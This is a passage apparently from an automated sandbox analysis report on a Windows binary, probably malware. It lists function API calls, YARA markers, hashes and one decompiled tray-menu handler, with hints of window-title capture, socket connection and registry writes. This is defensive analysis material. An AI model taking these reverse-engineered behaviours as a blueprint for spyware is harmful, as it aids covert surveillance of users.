                                          • Part of subcall function 00412F73: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FDB
                                          • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B80,?,00000000,?,?,?,?,?,?,?,?,0040542E), ref: 00412FF2
                                          • Part of subcall function 00412F73: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0040542E), ref: 00413001
                                          • Part of subcall function 00412F73: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(00000000,00000000,00000000), ref: 00413032
                                          • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0041305D
                                          • Part of subcall function 00412F73: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,0040542E), ref: 00413066
                                        • Sleep.KERNEL32(000001F4), ref: 0040543A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, ]), ref: 00405451
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,00000000), ref: 00405461
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040546E
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040547D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405486
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040548F
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405498
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004054A7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 004054C5
                                        • Sleep.KERNEL32(00000064), ref: 004054D9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@$??1?$basic_string@V01@@$D@1@@Window$?begin@?$basic_string@D@2@@0@Hstd@@SleepTextV?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?end@?$basic_string@?find@?$basic_string@?length@?$basic_string@ForegroundG@2@@std@@G@std@@LengthV01@V10@V10@@V12@
                                        • String ID: [ $ ]
                                        • API String ID: 3011177377-93608704
                                        • Opcode ID: b17b501f1748e2fb1ab18a7c3d85fa49411d46d8c8bbb0057a51120c035d8143
                                        • Instruction ID: b52ba732bfb27aa553af63110ce50c569faff7b52b45cf0ea854f8293cee1314
                                        • Opcode Fuzzy Hash: b17b501f1748e2fb1ab18a7c3d85fa49411d46d8c8bbb0057a51120c035d8143
                                        • Instruction Fuzzy Hash: A9219571A00508BBCB00B7A4DC5ABEF7B78EF44344F004176F602A3192DF7455898B9D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00403744, Relevance: 24.1, APIs: 16, Instructions: 67stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,0041B310), ref: 00403752
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040375B
                                        • GetDriveTypeA.KERNEL32(00000000,?,0000000A), ref: 00403773
                                        • _itoa.MSVCRT ref: 0040377A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0000002D), ref: 00403790
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403798
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,?,00000000), ref: 004037A7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@D@Z.MSVCP60(?,00000000), ref: 004037B4
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004037C0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037C9
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037D2
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004037DB
                                        • lstrlenA.KERNEL32(00000000), ref: 004037E2
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004037F8
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 00403801
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00403FC8), ref: 0040380A
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@1@@D@2@@0@Hstd@@V01@@V10@V?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?data@?$basic_string@DriveTypeV01@_itoalstrlen
                                        • String ID:
                                        • API String ID: 3966177967-0
                                        • Opcode ID: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                        • Instruction ID: 4300f458e19456516dd56dc641f8d1b829b254aea369022c8032761b79b8ee60
                                        • Opcode Fuzzy Hash: 2ed17a773f70f2a2b96c76149902b1bc02ebe8e478459ea86c20583d4a86547d
                                        • Instruction Fuzzy Hash: B721ADB580060DEBCB05EBE0ED5DDDE777CAF54346B108025F912A3160EB746B49CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00413C3F, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 71windowCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E00413C3F(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x41c1f0 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x41c200);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x41c1fc) == 0) {
							ShowWindow( *0x41c1fc, 9);
							SetForegroundWindow( *0x41c1fc);
						} else {
							ShowWindow( *0x41c1fc, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x41c1f0, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L4:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L4;
			}








                                        0x00413c47
                                        0x00413c48
                                        0x00413d1c
                                        0x00413d2c
                                        0x00413d31
                                        0x00413d37
                                        0x00000000
                                        0x00413d37
                                        0x00413c4e
                                        0x00413c53
                                        0x00413d03
                                        0x00000000
                                        0x00000000
                                        0x00413d0c
                                        0x00413d14
                                        0x00413d14
                                        0x00413c5e
                                        0x00413c7a
                                        0x00413c7f
                                        0x00413cd1
                                        0x00413ceb
                                        0x00413cf7
                                        0x00413cd3
                                        0x00413cdb
                                        0x00413cdb
                                        0x00000000
                                        0x00413cd1
                                        0x00413c84
                                        0x00413c97
                                        0x00413ca0
                                        0x00413cbb
                                        0x00000000
                                        0x00413cbb
                                        0x00413c86
                                        0x00413c89
                                        0x00413c8c
                                        0x00413c69
                                        0x00000000
                                        0x00413c6c
                                        0x00413c60
                                        0x00413c63
                                        0x00413c66
                                        0x00000000

                                        APIs
                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 00413C6C
                                        • GetCursorPos.USER32(?), ref: 00413C97
                                        • SetForegroundWindow.USER32(?), ref: 00413CA0
                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 00413CBB
                                        • Shell_NotifyIconA.SHELL32(00000002,0041C200), ref: 00413D0C
                                        • ExitProcess.KERNEL32 ref: 00413D14
                                        • CreatePopupMenu.USER32 ref: 00413D1C
                                        • AppendMenuA.USER32 ref: 00413D31
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                        • String ID: Close
                                        • API String ID: 1657328048-3535843008
                                        • Opcode ID: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                        • Instruction ID: 3a9117e372e52b2e565462b42d507c4b1172ca251bbe850fbb6b863f13e0a9c7
                                        • Opcode Fuzzy Hash: 9fa95a8da91032cbadd5b612f76443252f964982233fd8ca9fbdea8ba32e519c
                                        • Instruction Fuzzy Hash: 3A210972180609FBDB115FA4ED0DBEA3F35FB08702F208021F606A51B1D7799AA0EB5D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040E7F7, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 94COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00000000), ref: 0040E91D
                                          • Part of subcall function 00402010: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,?,0040E823,00000001,?,00000000), ref: 0040201E
                                          • Part of subcall function 0040209B: connect.WS2_32(0041BE70,0041BE74,00000010), ref: 004020B1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040E845
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                          • Part of subcall function 0041228F: GlobalMemoryStatusEx.KERNEL32(?), ref: 004122A0
                                          • Part of subcall function 0041230A: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,0041B320), ref: 0041231D
                                          • Part of subcall function 0041230A: GetProcAddress.KERNEL32(00000000), ref: 00412324
                                          • Part of subcall function 0041230A: Sleep.KERNEL32(000003E8,?,0041B320), ref: 0041233F
                                          • Part of subcall function 0041230A: __aulldiv.LIBCMT ref: 004123E4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000001,?,00000095), ref: 0040E87F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,?,00000000), ref: 0040E898
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000008,z@,00000000), ref: 0040E8AC
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8B7
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040E8C1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000096), ref: 0040E8DE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F0
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E8F9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@$D@1@@$D@2@@0@Hstd@@V01@@V10@0@V?$basic_string@$AddressGlobalHandleMemoryModuleProcSleepStatus__aulldivconnect
                                        • String ID: z@
                                        • API String ID: 1937136672-317290069
                                        • Opcode ID: b2e888e36a4149ccbd4d1433f25e5fa503bbd364d31bbff0643b279aff1329be
                                        • Instruction ID: 66f006b43ec3188ac29da0c8503291dee518f3a81564da720cf043436550991c
                                        • Opcode Fuzzy Hash: b2e888e36a4149ccbd4d1433f25e5fa503bbd364d31bbff0643b279aff1329be
                                        • Instruction Fuzzy Hash: E1318472C0010CEBDB01EBA1DD49EDEB778AB54305F00416AFA12A70D1EFB55B48CBA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040BD9B, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 62COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU,?,?,00000004), ref: 0040BDC6
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE2B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                        • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                        • API String ID: 2054586871-62392802
                                        • Opcode ID: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                        • Instruction ID: 2660231c1808b36434503ece8d2e95605cb547f4994df65369f224bebc220479
                                        • Opcode Fuzzy Hash: a466e65ffd345a8b6a55af1eb436ab666088b088688f1f759b6253a5e0949071
                                        • Instruction Fuzzy Hash: 8D01C43A58122AA2CE049AD0EC01ADA7708CF057B2F71007BAE04B76C0CB38D9854BCD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004121E8, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 51COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040B5A2: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 0040B5C3
                                          • Part of subcall function 0040B5A2: RegQueryValueExW.ADVAPI32(80000000,00412203,00000000,00000000,?,00000400), ref: 0040B5E2
                                          • Part of subcall function 0040B5A2: RegCloseKey.ADVAPI32(80000000), ref: 0040B5EB
                                          • Part of subcall function 0040B5A2: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415800,?), ref: 0040B60A
                                        • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412210
                                        • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412223
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 0041222D
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,00409BE6,?,00000000), ref: 00412236
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00409BE6,?), ref: 0041224F
                                          • Part of subcall function 0041290A: ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,69D8CB60,?,?,0041225E,?), ref: 00412919
                                          • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,0041225E,?), ref: 00412937
                                          • Part of subcall function 0041290A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,0041225E,?), ref: 0041293F
                                          • Part of subcall function 0041290A: ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,0041225E,?), ref: 0041294A
                                          • Part of subcall function 0041290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,0041225E,?), ref: 00412954
                                          • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 0041295D
                                          • Part of subcall function 0041290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,0041225E,?), ref: 00412975
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00412265
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0041226E
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0041227B
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00412284
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@G@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                        • String ID: .exe$http\shell\open\command
                                        • API String ID: 2647146128-4091164470
                                        • Opcode ID: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                        • Instruction ID: d6ae35875aa51399811599ff5055279212e103e4be7b08956a6055bd29980306
                                        • Opcode Fuzzy Hash: 252b6526ca8ce19ecb12a8c89719758da3f71089f7038446805540d7e0c89632
                                        • Instruction Fuzzy Hash: F011127291061DEBCF04EBE0EC49FFD7738FB48304F544425F512A21A0DA74A148CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0041000F, Relevance: 18.1, APIs: 12, Instructions: 81COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00410020
                                        • EnumDisplayMonitors.USER32(00000000,00000000,0041010A,00000000), ref: 0041003D
                                        • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 0041004D
                                        • EnumDisplayDevicesW.USER32(?,00000000,?,00000000), ref: 00410078
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,0041623C), ref: 00410095
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004100A0
                                        • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004100AC
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100B5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100BE
                                        • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 004100DF
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004100F5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004100FE
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$DisplayEnum$??0?$basic_string@??1?$basic_string@Devices$G@1@@V01@@$G@2@@0@Hstd@@MonitorsV01@V10@V?$basic_string@Y?$basic_string@
                                        • String ID:
                                        • API String ID: 2807017801-0
                                        • Opcode ID: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                        • Instruction ID: 1aed4e64735882a0db0bb71c951f021fa06bcdcdb304fa8f35c3d61367e112a6
                                        • Opcode Fuzzy Hash: eb84855e3950ea35a9c7bfda1fc650b5d2b847637b3ce86eaa20f1cf7d9f2166
                                        • Instruction Fuzzy Hash: DE21DA7290111EEBDB509BA1DC88EEFBF7CEF19345F004166F50AE2050EB749689CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401EA2, Relevance: 18.1, APIs: 12, Instructions: 80COMMON
                                        Download Yara Rule
                                        APIs
                                        • _EH_prolog.MSVCRT ref: 00401EA7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                        • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                          • Part of subcall function 00412718: _itoa.MSVCRT ref: 00412736
                                          • Part of subcall function 00412718: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,0040CC05,?,00000000,0041B310,00000000,0041B310,?), ref: 0041274A
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                          • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                          • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@$D@1@@$?size@?$basic_string@H_prologV01@@_itoa
                                        • String ID:
                                        • API String ID: 3851886811-0
                                        • Opcode ID: 01e573960dee240ea2726ef75e9d492289b20872cd0126e6f5a200e95ae8709c
                                        • Instruction ID: 3c13f4a99a68d7d03b3b7bfc4098c6c0fbf2233efe5d64f965fa74e17679f3d5
                                        • Opcode Fuzzy Hash: 01e573960dee240ea2726ef75e9d492289b20872cd0126e6f5a200e95ae8709c
                                        • Instruction Fuzzy Hash: 3C212FB280010DEBCB05EBD1ED499EEBB78FB54315F14412AF412A7061EB755A48CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004133FE, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 134COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B14,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041343B
                                          • Part of subcall function 0040B708: RegCreateKeyA.ADVAPI32(?,?,?), ref: 0040B715
                                          • Part of subcall function 0040B708: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BCB0,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B724
                                          • Part of subcall function 0040B708: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B72E
                                          • Part of subcall function 0040B708: RegSetValueExA.ADVAPI32(?,0040B948,00000000,?,00000000,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B741
                                          • Part of subcall function 0040B708: RegCloseKey.ADVAPI32(?,?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B74C
                                          • Part of subcall function 0040B708: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,0040B948,?,?,?,?,?,?,00000000), ref: 0040B75B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B10,?,00000001,?,00000000,?,0040E493,00000000,00000000), ref: 0041347F
